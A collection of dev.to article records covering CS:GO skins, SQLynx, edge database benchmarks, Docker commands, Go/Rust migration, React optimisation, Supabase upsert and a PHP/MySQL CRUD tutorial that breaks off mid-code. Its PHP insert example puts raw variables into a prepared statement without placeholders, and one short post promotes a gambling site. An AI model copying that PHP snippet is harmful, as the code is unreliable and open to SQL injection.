Utöver deras ekonomiska värde har CSGO-skinn också haft en betydande kulturell inverkan. De har blivit en statussymbol inom spelcommunityt, med sällsynta och dyra skinn som ses som ett tecken på prestige. Skins erbjuder också en form av självuttryck, vilket gör att spelare kan anpassa sin upplevelse i spelet. Önskan om unika och visuellt tilltalande skinn har till och med påverkat designvalen hos spelare och professionella lag.
Slutsats
CSGO-skins representerar en fascinerande skärningspunkt mellan spel, ekonomi och kultur. De har förvandlats från enkla kosmetiska föremål till värdefulla tillgångar inom en komplex virtuell ekonomi. Även om deras popularitet har lett till betydande ekonomiska möjligheter, har det också introducerat olika utmaningar och kontroverser. När världen av digitala varor fortsätter att utvecklas, kommer CSGO-skins utan tvekan att förbli en viktig fallstudie i de virtuella ekonomiernas potential och fallgropar.
http://cskejsaren.se | cskeisari665 | |
1,881,413 | How to Automatically Generate Sample Data for a Table by SQLynx | SQLynx: A Leading SQL Integrated Development Environment (IDE) SQLynx is a leading SQL IDE recognized... | 0 | 2024-06-08T15:29:57 | https://dev.to/concerate/how-to-automatically-generate-sample-data-for-a-table-by-sqlynx-4nd0 | SQLynx: A Leading SQL Integrated Development Environment (IDE)
SQLynx is a leading SQL IDE recognized globally for its powerful features in database management and SQL querying. One particularly useful feature it offers is sample data generation. This functionality is especially important for developers, data analysts, and testers. Here is a detailed introduction to the sample data generation feature of SQLynx:
**1. Feature Overview**
The sample data generation feature of SQLynx aims to help users quickly create large volumes of high-quality sample data. This is useful for developing and testing database applications, validating database designs, and conducting performance tests. By automatically generating sample data, SQLynx saves users the time and effort required for manual data entry, ensuring that the generated data is realistic and diverse.
**2. Key Features**
Support for Various Data Types
SQLynx supports generating sample data for various data types, including integers, floats, strings, dates, and times. This allows users to generate appropriate data for different table structures and field types.
Custom Data Patterns
Users can customize data generation patterns according to their needs. For example, they can define numerical ranges or time ranges for date fields, thereby generating datasets that meet specific requirements.
Mix of Random and Real Data
Users can choose to generate purely random data or mix in some existing real data to increase the realism of the sample data. This helps simulate more realistic use cases.
**3. Use Cases**
Development Phase
During the development of new database applications, the sample data generation feature can help developers quickly populate the database for functional testing and validation.
Testing Phase
Testers can use the generated sample data for various tests, including performance tests, load tests, and stress tests, to ensure the stability and performance of the database under different conditions.
Training and Demonstration
In database training or product demonstrations, the sample data generation feature of SQLynx can quickly create representative datasets, helping the audience better understand and experience the product's features.
**4. Usage Example**
Suppose we have a user information table users and need to generate some sample data for testing. Using SQLynx's sample data generation feature, we can proceed as follows (here we set to generate 5000 records, but it can handle up to billions of records):
**Select the Data Table**
In SQLynx, select the table for which you need to generate sample data, such as 'users'
create table users (id int, username varchar(20), age int)

**Setting Field Parameters:**
Set data generation rules for each field. For example, set the values for the age field to be between 18 and 60, generate appropriate strings for the username field, and generate corresponding values for the id field.

**Generating Data:**
Click the generate button, and SQLynx will generate the specified amount of sample data according to the set rules and insert it into the users table.

**Viewing and Validation:**
The generated data will automatically be displayed in SQLynx's data view, allowing users to review and validate the data to ensure it meets expectations.

**Conclusion**
SQLynx's sample data generation feature provides developers and testers with an efficient and flexible tool to quickly create and manage sample data. This not only improves work efficiency but also ensures the comprehensiveness and accuracy of testing. Whether for daily development, testing, demonstrations, or training, SQLynx offers robust support to users.
| concerate | |
1,881,401 | Edge Database Benchmarks | Many database services are out there to solve your problems. However, you might be overwhelmed with... | 0 | 2024-06-08T15:28:14 | https://dev.to/algoorgoal/edge-database-benchmarks-2eac | Many database services are out there to solve your problems. However, you might be overwhelmed with all the options available(Was it only me?🥲). I found a database benchmark tool that Vercel built. This may help you make your database decisions. In this post, I'll go over the basic terminologies, my benchmark results, and some insights. Hopefully, it'll be able to give you a general idea about performance.
## Terminologies
Let's sort out all the terms we need to understand before moving on to the main point.
### CDN(Content Delivery Network)
CDN caches static contents such as HTML, CSS, and media files distributed to servers around users so that users can receive the contents faster.
### Edge Computing
Instead of running a distant server, you place multiple servers near the users to run computations. It reduces long-distance client-server communications.
### Edge Database
We just said edge computing came out to reduce client-server communications. It will lose its main purpose if the database is far from the edge servers since most edge computations require database access. You can put data and computing around users altogether. That's where people came up with the idea of an edge database.
## Distributed SQLite
- SQLite is fast so the server can read and write SQLite quickly.
- Vendors like Cloudflare D1, Turso, and fly.io offer distributed SQLite.
- Since they can be distributed, they align with edge databases and can be placed next to edge functions for fast access times.
- Turso stores the replicas of all databases in multiple regions by default.
## What's the point of Edge Database?

- Turso's Selling point
You can consider edge databases when you want your users to get consistent latency wherever they are. This is more beneficial when your application needs to serve multiple regions(or countries). I'm planning to build travel apps and that's how I got more interested in Edge Database. The following is the real-life scenario I could think of.

Let's say you're American and traveling to Europe at the moment. When you open a mobile app, it loads slowly since your data should be in America. To solve this, the application can store your data around your current location(Europe) now and data access time will be reduced.
Note that using SQLite as a distributed database is not a matured technology and [many people are still discussing(arguing).](https://news.ycombinator.com/item?id=39975596).
## Benchmarks
I'll use a database benchmark tool [a database benchmark tool](https://github.com/vercel-labs/function-database-latency) to see how well each database provider performs. Note that I'm testing this in South Korea, so I'm far away from the original database enough to test the performance(US East). I set the test options in the following manner.

- Location option: Global function (Edge), Regional function(Edge / US East), and Serverless function (Node / US East)
- Waterfall: 5 sequential queries
- The number of samples for each location: 50
⚠️ Testing 50 requests might not be enough, but at least it gives you a general idea of the performance. Plus I set the Waterfall option to '5 sequential queries' to ensure real-life querying scenarios because each query usually depends on the result of the preceding queries(data dependency).
### Supabase with Drizzle ORM
- Latency distribution(processing time)

- Latency distribution(end-to-end)

- Supabase only runs on node, not on edge.
- Its processing time is ~30ms, and end-to-end access time is ~250ms. The end-to-end access time increases since the database lives in US East region.
### Neon with Drizzle ORM
- Latency distribution(processing time)

- Latency distribution(end-to-end)

- Global edge takes an extremely longer time than regional edge/node.
### PlanetScale with Drizzle ORM
- Latency distribution(processing time)

- Latency distribution(end-to-end)

- Global edge takes an extremely longer time than regional edge/node.
### Upstash with Drizzle ORM
- Latency distribution(processing time)

- Latency distribution(end-to-end)

- Global edge still takes longer time than regional edge/node
### Turso with Drizzle ORM
- Latency distribution(processing time)

- Latency distribution(end-to-end)

- Global edge still takes about the same time as edge/node.
## Test Results in Korea
- Actually, there was no point in using edge databases in Korea.
- Apparently, it's better to access data on the origin server.
Since this result is significantly different from [Turso's test result](https://turso.tech/blog/vercel-benchmarks-show-turso-has-low-latencies-everywhere-what-the-data-edge-is-good-for-7407579d4c88), I asked my friend in France to run Upstage and Turso tests there. Here's what she sent me.
### Turso with Drizzle ORM in France
- Latency distribution(processing time)

- Latency distribution(end-to-end)

- The real-life latency of the global edge is about 2 times lower than the others.
## Upstash with Drizzle ORM in France
- Latency distribution(processing time)

- Latency distribution(end-to-end)

- The real-life latency of the global edge is about the same as the others.
## Conclusion
- Turso's edge database approach didn't work in South Korea. The rest of them either.
- Turso worked significantly better in France and Brazil.
- I assume this difference came from the fact that the closest edge location to Korea is Japan, while the other two countries have their own edge locations.
- Database Services other than Turso didn't work with Global Edge. While this means default Turso replicas outperform the others, [PlanetScale can improve performance if you set up replicas in other 15 regions(enterprise plan).](https://planetscale.com/docs/concepts/replicas). [Supabase supports 12 cross-regional read replicas configuration](https://supabase.com/docs/guides/database/replication).
Unfortunately, Neon only supports read replicas in the same region.
## References
- [Vercel's database benchmark tool](https://github.com/vercel-labs/function-database-latency)
- [Turso's benchmark result comparison between US and Brazil](https://turso.tech/blog/vercel-benchmarks-show-turso-has-low-latencies-everywhere-what-the-data-edge-is-good-for-7407579d4c88)
- [Why a company migrated from PlanetScale to Turso](https://www.openstatus.dev/blog/migration-planetscale-to-turso) | algoorgoal | |
1,881,411 | Essential Docker commands every developer should know | Docker has revolutionized the way developers build, ship, and run applications. Whether you're just... | 0 | 2024-06-08T15:25:07 | https://dev.to/hemanthreddyb/essential-docker-commands-every-developer-should-know-kni | webdev, react, docker, devops | Docker has revolutionized the way developers build, ship, and run applications. Whether you're just starting out or looking to brush up on your skills, understanding key Docker commands can greatly enhance your workflow. In this blog post, we'll cover some of the most useful Docker commands and explain how to use them effectively.
## Docker Basics
**1. docker --version**
**Purpose:** Check your Docker version.
```
docker --version
```
This command helps verify that Docker is installed and provides information about the installed version.
**2. docker info**
**Purpose:** Display system-wide information about Docker.
```
docker info
```
Use this command to get detailed information about your Docker installation, including the number of containers, images, and system resources.
## Working with Containers
**3. docker run**
**Purpose:** Create and start a new container.
```
docker run -d -p 80:80 --name my_container nginx
```
This command starts a new container in detached mode (-d), maps port 80 of the host to port 80 of the container (-p 80:80), and names the container my_container.
**4. docker ps**
**Purpose:** List running containers.
```
docker ps
```
This command displays a list of all currently running containers, showing details like container ID, image, and ports.
**5. docker stop**
**Purpose:** Stop a running container.
```
docker stop my_container
```
This command stops the container named my_container. Use the container ID if the name is not specified.
**6. docker rm**
**Purpose:** Remove a stopped container.
```
docker rm my_container
```
After stopping a container, you can remove it using this command. This helps free up system resources.
**7. docker exec**
**Purpose:** Run a command inside a running container.
```
docker exec -it my_container /bin/bash
```
This command opens an interactive terminal session inside the container my_container. It’s useful for debugging and inspecting running containers.
## Managing Images
**8. docker images**
**Purpose:** List all Docker images on the host.
```
docker images
```
This command displays a list of all images stored on your local Docker host, including repository names, tags, and sizes.
**9. docker pull**
**Purpose:** Download an image from a Docker registry.
```
docker pull node
```
This command fetches the latest node image from the Docker Hub, the default registry.
**10. docker build**
**Purpose:** Build an image from a Dockerfile.
```
docker build -t my_image:latest
```
This command builds a new Docker image from a Dockerfile in the current directory and tags it as my_image:latest.
**11. docker rmi**
**Purpose:** Remove an image.
```
docker rmi my_image:latest
```
This command deletes the specified image from your local Docker host.
## Networks and Volumes
**12. docker network ls**
**Purpose:** List all Docker networks.
```
docker network ls
```
This command shows all networks available on your Docker host, including bridge, host, and overlay networks.
**13. docker network create**
**Purpose:** Create a new Docker network.
```
docker network create my_network
```
This command creates a new network named my_network.
**14. docker volume ls**
**Purpose:** List all Docker volumes.
```
docker volume ls
```
This command displays all volumes created on your Docker host, which are used for persistent data storage.
**15. docker volume create**
**Purpose:** Create a new Docker volume.
```
docker volume create my_volume
```
This command creates a new volume named my_volume.
Cleaning Up
**16. docker system prune**
**Purpose:** Clean up unused Docker objects.
```
docker system prune
```
This command removes all stopped containers, unused networks, dangling images, and build caches to free up space.
**Conclusion**
Mastering these Docker commands will help streamline your development workflow and make managing containers more efficient. Whether you're building applications, testing new environments, or deploying services, these commands provide a solid foundation for working with Docker.
Happy Dockering! | hemanthreddyb |
1,881,410 | I just Open Sourced my $100k worth Side Project for free 🤯 | I'm thrilled to announce that I've made my latest project open source under the MIT License. This... | 0 | 2024-06-08T15:21:08 | https://dev.to/darkinventor/i-open-sourced-my-ai-first-side-project-for-free-3bp2 | opensouce, javascript, webdev, react | I'm thrilled to announce that I've made my latest project open source under the MIT License.
This project is built using cutting-edge technologies like React, Next.js, Tailwind CSS, Framer-Motion, Shadcn UI, Magic UI, NextAuth, Supabase, Prisma, and Goodreads Custom API.
You can check it out at https://quotesai.vercel.app/

By making this project open source, I'm inviting the community to contribute, enhance, and expand its capabilities. I would greatly appreciate your contributions, whether it's fixing bugs, adding new features, or improving the codebase.
Some of the open issues I'm currently working on to include is adding a payment gateway (Stripe) and an email subscription feature to send 10 daily emails to users based on their selected category and more.

Feel free to fork or clone the repository from my GitHub: https://github.com/DarkInventor/QuotesAI
Please submit pull requests with proper README documentation and commit messages detailing your additions or changes.

I'm excited to collaborate with fellow developers and see how this project evolves through the power of open source.
Thank you for your contributions! | darkinventor |
1,881,407 | Singlet Innovations | The wrestling singlet, a hallmark of the sport, has seen significant innovations over the years.... | 0 | 2024-06-08T15:20:08 | https://dev.to/sports_apparel_9e9d31b1cf/singlet-innovations-d07 |
The wrestling singlet, a hallmark of the sport, has seen significant innovations over the years. Originally designed to address issues with loose-fitting attire, modern singlets have evolved to enhance performance, comfort, and safety.
Material Advancements
Today's singlets are made from advanced materials like moisture-wicking fabrics that keep athletes dry by drawing sweat away from the body. High-tech blends of nylon, spandex, and lycra provide superior elasticity and durability, ensuring the singlet maintains its shape and fit throughout rigorous matches. Some singlets even incorporate antimicrobial properties to reduce odor and bacteria growth, keeping wrestlers fresh and hygienic.
Design Enhancements
Innovative design features have also been introduced. Compression technology, often integrated into singlets, supports muscles and improves blood circulation, potentially enhancing performance and recovery. Flatlock stitching minimizes chafing and irritation, ensuring maximum comfort during long training sessions and competitions. Additionally, seamless designs reduce weak points in the fabric, increasing the longevity of the singlet.
Customization Options
Customization has become a key trend, allowing teams and individual wrestlers to express their identity and team spirit. Modern singlets can be customized with unique colors, patterns, and logos using advanced printing techniques. This not only boosts morale but also fosters a sense of unity and pride among team members.
Eco-Friendly Choices
With growing awareness of environmental issues, some manufacturers are producing eco-friendly singlets made from recycled materials. These sustainable options provide the same performance benefits while reducing the sport's environmental footprint. Wrestlers and teams can now choose gear that aligns with their values, promoting a more sustainable future for the sport.
Future Trends
Looking ahead, the future of wrestling singlets may include smart textiles with embedded sensors that track physiological data, providing real-time feedback on an athlete's performance and condition. This technology could revolutionize training and competition strategies, giving wrestlers a high-tech edge.
Conclusion
Innovations in wrestling singlets have significantly enhanced the sport, from advanced materials and design improvements to customization and sustainability. These developments ensure that wrestlers not only perform at their best but also feel comfortable, confident, and proud in their gear. As technology continues to advance, the wrestling singlet will undoubtedly evolve, reflecting the dynamic and forward-thinking nature of the sport.
| sports_apparel_9e9d31b1cf | |
1,881,406 | Supabase UPSERT | UPSERT in Supabase is intended to be a simplified combination of UPDATE and INSERT. (If the record... | 0 | 2024-06-08T15:12:52 | https://dev.to/mwoollen/supabase-upsert-1ebc | supabase, javascript, upsert | UPSERT in Supabase is intended to be a simplified combination of UPDATE and INSERT. (If the record already exists, then it will be updated and if not, then one will be created).
However, for me, UPSERT was a bit tricky to understand and get working. Suppose I have a table ('the_table') with primary keys: 'id' (type: uuid, default: gen_random_uuid()) and 'name' (type: text). The [standard documentation](https://supabase.com/docs/reference/javascript/upsert) indicates using "onConflict" but does not provide any useful example. I managed to find an [article on restack.io](https://www.restack.io/docs/supabase-knowledge-supabase-upsert-guide) that had a brief code snippet buried in several pages down. I adjusted to show how onConflict can reference the 'name' column.
```
const { data: retData, error: retError } = await supabase
.from('the_table')
.upsert({ name: 'Pablo', description: 'Helpful and friendly'}, { onConflict: 'name' }).select();
console.log("Error: ", retError )
console.log("Data: ", retData[0].name, ", ", retData[0].description);
```
This snippet shows how to UPSERT a record into 'the_table' where the conflict resolution is based on the 'name' column. If a record with name ('Pablo') exists, then it will be updated; otherwise, a new record will be inserted.
| mwoollen |
1,881,405 | Tech Transfer from Old Languages to GO and Rust | Preface Recently, I have come across news that major technology companies are migrating... | 0 | 2024-06-08T15:11:05 | https://dev.to/gokayburuc/tech-transfer-from-old-languages-to-go-and-rust-3nj9 | rust, go, discuss, review |
## Preface
Recently, I have come across news that major technology companies are migrating their existing projects, originally written in languages such as C, C#, Java, and Python, to the GO programming language. I have also read articles about some tech companies transferring their projects to the Rust language, though this is happening less frequently than with GO.
## Reasons Driving Technology Transfers
Several key factors are driving the shift towards new programming languages in the tech industry. These include:
- Speed and Performance Concerns: Projects written in languages like Python2, Java, PHP, C#, and C often fail to meet the speed expectations of modern applications. Well-structured projects can be exceptions, but generally, performance is lacking.
- Scalability: As projects expand with evolving technologies, there is a growing preference for languages that inherently support scalability.
- Increasing Costs: The rising costs associated with developing across multiple technologies are prompting a shift towards faster programming languages like GO and Rust, which can address multiple needs efficiently.
- Reduced Development Time: Back-end structures that require thousands of lines of code in languages like Python2 can be significantly reduced when using GO and Rust. These languages allow for smaller microstructures, leading to faster development times. Features such as LSP support, autocorrection, ease of refactoring, and simple documentation make these languages stand out even more.
- Rapid Documentation: Project documentation can be swiftly created using static site generators like Hugo and Mdbook, facilitating easy sharing of project information.
- Ease of Learning: Coding standards in these languages contribute to easier learning curves for developers.
## Rewriting in Rust
I first encountered the concept of migrating well-known projects to GO and Rust languages on a Russian developer forum. While browsing the forum, I stumbled upon this idea through a slogan and a project poster. Here is the visual of the project:

The project's goal was to rewrite libraries and projects that were previously developed in other languages using Rust. To achieve this, the forum facilitated technology discussions among developers.
Similarly, there are GitHub communities dedicated to executing the same project for the GO language.
## Technology Transfers in Companies
During my internet research, I observed that various startups and large-scale technology companies are experimenting with GO and Rust languages in their new projects and gradually transitioning their existing projects to these languages. Notably, I found many companies migrating their existing projects from languages such as PHP and Java to Rust and GO.
Additionally, when searching Reddit forums for "company migration to <techname>", I discovered several posts written on this topic at various times. Below, I share with you one such Reddit post:
<blockquote class="reddit-embed-bq" style="height:316px" data-embed-height="316"><a href="https://www.reddit.com/r/golang/comments/15hztqt/company_migration_to_go/">Company migration to Go</a><br> by<a href="https://www.reddit.com/user/kekekepepepe/">u/kekekepepepe</a> in<a href="https://www.reddit.com/r/golang/">golang</a></blockquote><script async="" src="https://embed.reddit.com/widgets.js" charset="UTF-8"></script>
You can also find numerous articles on technology transfers on Medium. Here is a sample article:
[Our Journey: Moving from PHP to GO](https://medium.com/beyn-technology/our-journey-moving-from-php-to-go-4b4513f92e75)
Additionally, the **_YCombinator_** website features articles on various related topics.
[Programming Languages: From Python to 500,000 Lines of GO - How One Organization is Making a Big Switch](https://www.zdnet.com/article/programming-languages-from-python-to-500000-lines-of-go-how-one-organization-is-making-a-big-switch/)
Moreover, Khan Academy details the process of completely transferring their backend code from Python2 to the GO language.
## GO Case Studies
You can find articles detailing various processes on the official GO programming language website:
[GO Solutions and Case Studies](https://go.dev/solutions/case-studies)
In addition to these, hundreds of companies, both large and small, are experimenting with GO and Rust languages in various projects every day. However, due to the confidentiality of internal company information, I cannot share details that companies have not officially disclosed. If you are active on social platforms such as LinkedIn, Twitter, and Reddit, you can also find this information there.
## Project Transfer Stages
During the transfer stages, auxiliary teams are typically established to work in parallel with the existing teams. Think of it like a railway system: to change the rail line without derailing the train or halting services, a second line is constructed alongside the original, with a secondary switch connection. Once the new line is complete, the first line is bypassed and deactivated. Many companies find this method more cost-effective, allowing them to smoothly transition their current projects to new technology.
Another transfer method involves decommissioning projects that are outdated or lack necessary features, then rewriting them in GO and Rust languages before putting them back into operation. These rewritten projects, especially those requiring load balancing and scalability, are maintained and re-released in their GO and Rust versions.
Libraries Becoming Richer Day by Day
Although GO and Rust do not yet have as extensive internet libraries as common languages like Python and JavaScript, these libraries are being continuously transferred and incorporated into projects. For instance, you can now find GO and Rust versions of web scrapers or machine learning libraries originally written in Python. These can be obtained from the following websites:
- GO: [pkg.go.dev](https://pkg.go.dev/)
- Rust: [crates.io](https://crates.io/)
## Advantages and Disadvantages
> **DISCLAIMER:** This article originally written in Turkish language for Turkish developers.This part contains the review for Turkish developers. So if you are not interested in this part you can pass it.
- Enhancing Interactive Discussion Platforms: Social media platforms like Twitter, Twitch, Reddit, and YouTube, as well as Discord servers, are experiencing a surge in active discussions and information sharing.
- Insufficient Local Turkish Platforms: Turkey currently lacks an adequate number of community and discussion platforms. In countries known for technology production such as Japan, Russia, Germany, India, Brazil, Spain, and the UAE, local language blogs and community websites have been established since 2012 and are now active.
- Increasing Community Support: While community support for GO and Rust is not as widespread as it is for languages like Python, JavaScript, and React, it is steadily growing. Promotional activities and developer gatherings, especially events like GopherCON, are contributing to this expansion.
- Absence of Turkish E-Books: Despite the existence of over 50 books published in English, there are currently no e-books or printed publications available in Turkish.
## Conclusion
In this article, I have endeavored to provide a concise overview and promote awareness regarding technology transfers involving GO and Rust programming languages. It is important to note that this perspective is subjective and subject to discussion. As the development process progresses with diverse languages and technologies, it is possible that we may encounter additional programming languages in the future.
I sincerely appreciate your time and consideration in reading my article in its entirety. We look forward to welcoming you in our upcoming articles.
| gokayburuc |
1,881,403 | React: Essential Concepts and Best Practices | Introduction A overview to refresh your knowledge of React's core functionality. Let's... | 0 | 2024-06-08T15:06:45 | https://dev.to/bgdnvarlamov/react-essential-concepts-and-best-practices-1lf4 | react, tutorial, webdev, javascript | ## Introduction
A overview to refresh your knowledge of React's core functionality.
Let's take a look at a React app and explore ways to improve the code.
## Initial code
```javascript
export default function App() {
const cars = [
{
name: "Lightning McQueen ⚡️",
image:
"https://i.pinimg.com/1200x/c4/50/07/c45007f8ec1d37926d87befde23ec323.jpg",
},
// ...
];
return (
<div className="App">
<Container cars={cars} />
</div>
);
}
function Container({ cars }) {
let title = "Participants";
const [isTitleUppercase, setTitleUppercase] = useState(false);
const generateExtraParams = () => {
return {
position: 1,
selfConfidence: Infinity,
};
};
const handleClick = () => {
setTitleUppercase((prev) => !prev);
};
return (
<>
<header>
<h1>{isTitleUppercase ? title.toUpperCase() : title}</h1>{" "}
<button onClick={handleClick}>Case toggle 🖲️</button>
</header>
<main>
{cars.map((car, index) => (
<CarCard
key={index}
car={car}
// extraParams={generateExtraParams()}
/>
))}
</main>
</>
);
}
function CarCard({ car, extraParams }) {
console.log(`🏎️ Ka-Chow! ⚡️⚡️⚡️`);
return (
<>
<p>{car.name}</p>
<div id="iw">
<img src={car.image} width={100} />
</div>
{extraParams &&
Object.entries(extraParams).map(([key, value]) => (
<p key={Math.random()}>
<i>{key}:</i> {value}
</p>
))}
</>
);
}
```
## 1. Prevent Unnecessary Re-renders
Now, when we click the 'Case toggle' button, we see that `CarCard` is re-rendering. Why does this happen and what can we do about it?
This happens because the button handler exists in the parent component, which triggers a re-render of that component and all its children. To fix this, we can use `React.memo` to wrap our `CarCard` component. `React.memo` is a higher-order component that will only re-render the wrapped component if its props change. This way, `CarCard` won't re-render unless its specific props change.
Here's how we can implement it:
```javascript
const CarCard = React.memo(function ({ car, extraParams }) {
console.log(`🏎️ Ka-Chow! ⚡️⚡️⚡️`);
return (
<>
<p>{car.name}</p>
<div id="iw">
<img src={car.image} width={100} />
</div>
{extraParams &&
Object.entries(extraParams).map(([key, value]) => (
<p key={Math.random()}>
<i>{key}:</i> {value}
</p>
))}
</>
);
});
```
## 2. Memoize Function Calls
When you uncomment the line `extraParams={generateExtraParams()}` and click the `'Case toggle' button`, you'll notice that CarCard re-renders. This happens because generateExtraParams creates a new object on every render, and React treats it as new data.
To prevent this, we use `React.useMemo` to memoize the result of `generateExtraParams`. This ensures that the function is only called once and the same object is used on subsequent renders, preventing unnecessary re-renders.
```javascript
const generateExtraParams = () => {
return {
position: 1,
selfConfidence: Infinity,
};
};
const extraParams = React.useMemo(() => generateExtraParams(), []);
```
## 3. Create a Custom Hook
Can we create a custom hook to manage the toggle uppercase functionality, since we might need this in multiple places in the future? Absolutely. Let's implement it:
```javascript
const useToggle = () => {
const [isTitleUppercase, setTitleUppercase] = useState(false);
const toggle = () => {
setTitleUppercase((prev) => !prev);
};
return [isTitleUppercase, toggle];
};
// Inside the Container
const [isTitleUppercase, toggle] = useToggle();
// And use it like this:
<header>
<h1>{isTitleUppercase ? title.toUpperCase() : title}</h1>{" "}
<button onClick={toggle}>Case toggle 🖲️</button>
</header>
```
We moved the state and function to a custom hook, which we can reuse in different places as needed.
## 4. Use Context for Deep Prop Drilling
Now, if we need to pass a prop deeply through the component tree, can we do it better than just prop drilling? Yes, we can use context for this.
React Context is a way to manage state globally. It allows you to create a context object, which can then be provided to the component tree. Any component in the tree can consume the context value without needing to pass props through every level.
Here's how we can implement it:
1. Create Context:
We create a context object using `React.createContext()` and provide a default value. In this case, we'll create a context for our cars.
2. Provide Context:
We use a context provider to wrap our component tree. This makes the context value available to all components within the provider.
3. Consume Context:
Any component that needs the context value can use the useContext hook to access it.
We also create a custom hook `useCarsContext` to make it easier to consume the context. This hook encapsulates the useContext call, so we don't need to repeat it in every component that needs the context value.
Here's how the updated code looks:
```javascript
import React, { useMemo, useState, useContext, createContext } from "react";
const CarsContext = createContext([]);
const useCarsContext = () => useContext(CarsContext);
export default function App() {
const cars = [
{
name: "Lightning McQueen ⚡️",
image:
"https://i.pinimg.com/1200x/c4/50/07/c45007f8ec1d37926d87befde23ec323.jpg",
},
// ...
];
return (
<CarsContext.Provider value={cars}>
<div className="App">
<Container />
</div>
</CarsContext.Provider>
);
}
const useToggle = () => {
const [isTitleUppercase, setTitleUppercase] = useState(false);
const toggle = () => {
setTitleUppercase((prev) => !prev);
};
return [isTitleUppercase, toggle];
};
function Container() {
let title = "Participants";
const [isTitleUppercase, toggle] = useToggle();
const generateExtraParams = () => {
return {
position: 1,
selfConfidence: Infinity,
};
};
const extraParams = useMemo(() => generateExtraParams(), []);
const cars = useCarsContext();
return (
<>
<header>
<h1>{isTitleUppercase ? title.toUpperCase() : title}</h1>{" "}
<button onClick={toggle}>Case toggle 🖲️</button>
</header>
<main>
{cars.map((car, index) => (
<CarCard key={index} car={car} extraParams={extraParams} />
))}
</main>
</>
);
}
const CarCard = React.memo(function ({ car, extraParams }) {
console.log(`🏎️ Ka-Chow! ⚡️⚡️⚡️`);
return (
<>
<p>{car.name}</p>
<div id="iw">
<img src={car.image} width={100} />
</div>
{extraParams &&
Object.entries(extraParams).map(([key, value]) => (
<p key={Math.random()}>
<i>{key}:</i> {value}
</p>
))}
</>
);
});
```
## 5. Avoid Using Index and Math.random() for Keys
One last improvement: using index and Math.random() for keys in lists is not a good practice. Instead, use a unique identifier related to the item. This ensures React can track which items are added, moved, or removed correctly.
## Conclusion
I hope this refreshed your memory about core React functionality. By exploring these basic examples and improvements, we've seen how to make our React apps more efficient and easier to maintain.
*Thanks for hanging out!* Hit subscribe for more! 👋 | bgdnvarlamov |
1,881,402 | Australia | Gambling is now very popular in Australia and you can find many different online casino sites. Many... | 0 | 2024-06-08T14:57:33 | https://dev.to/garrypotter/australia-4dnh | Gambling is now very popular in Australia and you can find many different online casino sites. Many people do not know how to make the final choice. I recommend you to pay attention to [megaslot ](https://megaslot-au.bet/)because here after registration you will get a bonus and you can use it immediately in the gameplay. This is a very generous casino with a large selection of slot machines | garrypotter | |
1,865,994 | Beginner's Guide to CRUD Operations in PHP | Introduction PHP is a flexible and widely-used server-side scripting language that powers... | 0 | 2024-06-08T14:54:25 | https://dev.to/rkadriu/mastering-crud-operations-with-php-and-mysql-51gh | php, mysql, webdev, crud | ## Introduction
PHP is a flexible and widely-used server-side scripting language that powers many of the dynamic and interactive web pages we see today. As a beginner myself, I find the journey of learning PHP both challenging and rewarding. In this post, we will explore more advanced topics in PHP, building upon the basics covered in my previous post.
If you haven't read my first post, [PHP Primer: A Beginner's Guide](https://dev.to/rkadriu/php-basics-a-brief-introduction-for-beginners-4l15), I highly recommend checking it out. It covers the fundamentals of PHP, including setting up your development environment, understanding basic syntax, and working with variables and data types.
As we dive deeper into PHP, I welcome any feedback, suggestions, or corrections. Your comments not only help me improve but also create a collaborative learning environment for all readers. Let's continue our PHP journey together!
## Setting Up a MySQL Database
Before we start coding, we need to set up a MySQL database. If you have XAMPP installed, you're already halfway there!
### Configuring MySQL in XAMPP
1. **Open XAMPP Control Panel:** Launch the XAMPP control panel and start the "Apache" and "MySQL" services.
2. **Open XAMPP Control Panel:** Launch the XAMPP control panel and start the "Apache" and "MySQL" services.
3. **Create a Database:**
- Click on the "New" button on the left sidebar.
- Enter a name for your database and click "Create."
There is another alternative option of creating database by writing `CREATE DATABASE database_name;` command in SQL script and then click Go command.
These steps are shown below with images.


First option of creating a database:

Creating a database using MySQL command on SQL script:

### Creating Tables Using phpMyAdmin
1. Select Your Database: Click on the database you just created.
2. Create a Table:
- Enter a name for your table (e.g., **users**).
- Specify the number of columns and click "Go."
- Define the columns (e.g., **id, name, email, age**).
Or by using MySQL commands in SQL script
```
CREATE TABLE users (
id INT(11) PRIMARY KEY AUTO_INCREMENT NOT NULL,
name VARCHAR(50) NOT NULL,
email VARCHAR(50) NOT NULL UNIQUE,
age INT(3) NOT NULL
)
``` and then click Go.
## Connecting PHP to MySQL
Using 'mysqli' to Connect to MySQL
Updated code below
```
<!-- Opening PHP tag to write PHP code -->
<?php
// Specifies the hostname of the MySQL server.
$servername = "localhost";
// The MySQL username. "root" is the default administrative username for MySQL.
$username = "root";
// The MySQL password for the specified user. It is empty ("") by default for the root user in many local development environments.
$password = "";
// The name of the database you want to connect to.
$dbname = "php_project";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $dbname);
// Check connection
if (!$conn) {
// Log the error and display a generic message to the user
error_log("Connection failed: " . mysqli_connect_error());
die("Connection failed. Please try again later.");
}
// If the connection is successful, display or log a success message
echo "Connected successfully";
// Close the connection (optional, as it will close when the script ends)
mysqli_close($conn);
?>
```
## Performing CRUD Operations
Performing CRUD operations in the context of web development refers to the basic operations that can be performed on data stored in a database: Create, Read, Update, and Delete. These operations are fundamental to building dynamic and interactive web applications where users can interact with data. CRUD operations are the backbone of database interactions in web applications. PHP allows you to perform these operations easily by defining variables that contain SQL code and executing them using PHP's database interaction libraries like MySQLi
### Create: Inserting Data
Updated code ↓
```
<?php
// Set a value for each variable. Variables type of values should be same as set in database
$name = "person1";
$email = "person1@example.com";
$age = 25;
// Prepare the SQL statement
$stmt = mysqli_prepare($conn, "INSERT INTO users (name, email, age) VALUES ($name, $email, $age)");
// Bind parameters to the prepared statement
mysqli_stmt_bind_param($stmt, "ssi", $name, $email, $age);
// Execute the prepared statement
if (mysqli_stmt_execute($stmt)) {
echo "New record created successfully </br>";
} else {
// Log the error for debugging purposes
error_log("Error: " . mysqli_stmt_error($stmt));
// Display a generic error message to the user
echo "An error occurred while creating the record. Please try again later.";
}
// Close the prepared statement
mysqli_stmt_close($stmt);
```
### Read: Fetching Data
The Read operation is used to fetch data from a database. This is typically done using the SELECT statement in SQL. Here's a step-by-step code and explanation of how to perform a read operation in PHP:
```
// Create an SQL query
$sql = "SELECT id, name, email, age FROM users";
$result = mysqli_query($conn, $sql);
// Check if there are any results
if (mysqli_num_rows($result) > 0) {
// Fetch and output data of each row
while($row = mysqli_fetch_assoc($result)) {
